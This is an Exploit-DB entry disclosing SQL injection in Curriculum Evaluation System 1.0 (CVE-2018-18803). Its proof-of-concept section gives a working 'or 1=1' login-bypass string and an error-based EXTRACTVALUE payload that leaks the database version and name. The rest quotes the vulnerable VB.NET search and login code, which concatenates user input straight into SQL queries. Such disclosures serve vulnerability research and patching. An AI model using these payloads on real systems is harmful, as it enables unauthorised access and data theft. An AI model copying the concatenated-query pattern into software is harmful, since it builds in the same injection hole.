Curriculum Evaluation System 1.0 - SQL Injection

EDB-ID:

45719




Platform:

PHP

Date:

2018-10-29


# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803

# POC: 
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe

# POC: 
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
# 
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png

#[PATH]/frmCourse.vb
#....
#47     Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48         sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49         reloadDtg(sql, dtglist)
#50     End Sub
#....

#[PATH]/includes/user.vb
#....
#05     Public Sub login(ByVal username As Object, ByVal pass As Object)
#06         Try
#07 
#08             con.Open()
#09             reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10 
#11 
#12             If dt.Rows.Count > 0 Then
#13                 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16                     With Form1
#17                         .tsAddG.Enabled = True
#18                         .tsStudent.Enabled = True
#19                         .tsCurriculum.Enabled = True
#20                         .tsGrades.Enabled = True
#21                         .tsReport.Enabled = True
#22                         .tsUtilities.Enabled = True
#23                         .tsSearchStudent.Enabled = True
#24                         .tsLogin.Image = My.Resources.logout
#25                         .tsLogin.Text = "Logout"
#26                     End With
#27 
#28 
#29                     LoginForm1.Close()
#30 
#31 
#32                 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33 
#34                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36                     With Form1
#37                         .tsAddG.Enabled = True
#38                         .tsStudent.Enabled = True
#39                         .tsCurriculum.Enabled = True
#40                         .tsGrades.Enabled = True
#41                         .tsReport.Enabled = True
#42                         .tsSearchStudent.Enabled = True
#43                         .tsLogin.Image = My.Resources.logout
#44                         .tsLogin.Text = "Logout"
#45                     End With
#46 
#47 
#48 
#49 
#50                     LoginForm1.Close()
#51 
#52 
#53 
#54                 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56                     'With Form1
#57                     With Form1
#58                         .tsAddG.Enabled = True
#59                         .tsStudent.Enabled = True
#60                         .tsCurriculum.Enabled = True
#61                         .tsGrades.Enabled = True
#62                         .tsReport.Enabled = True
#63 
#64                         .tsSearchStudent.Enabled = True
#65                         .tsLogin.Image = My.Resources.logout
#66                         .tsLogin.Text = "Logout"
#67                     End With
#68 
#69 
#70                     LoginForm1.Close()
#71                 End If
#72 
#73                 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74                 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75                 'Form1.StatusStrip1.Visible = True
#76                 'inserting logs
#77                 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78                 '   " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79                 'create(sql)
#80 
#81             Else
#82                 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83             End If
#84         Catch ex As Exception
#85             MsgBox(ex.Message)
#86         End Try
#87         con.Close()
#88         da.Dispose()
#89     End Sub
#....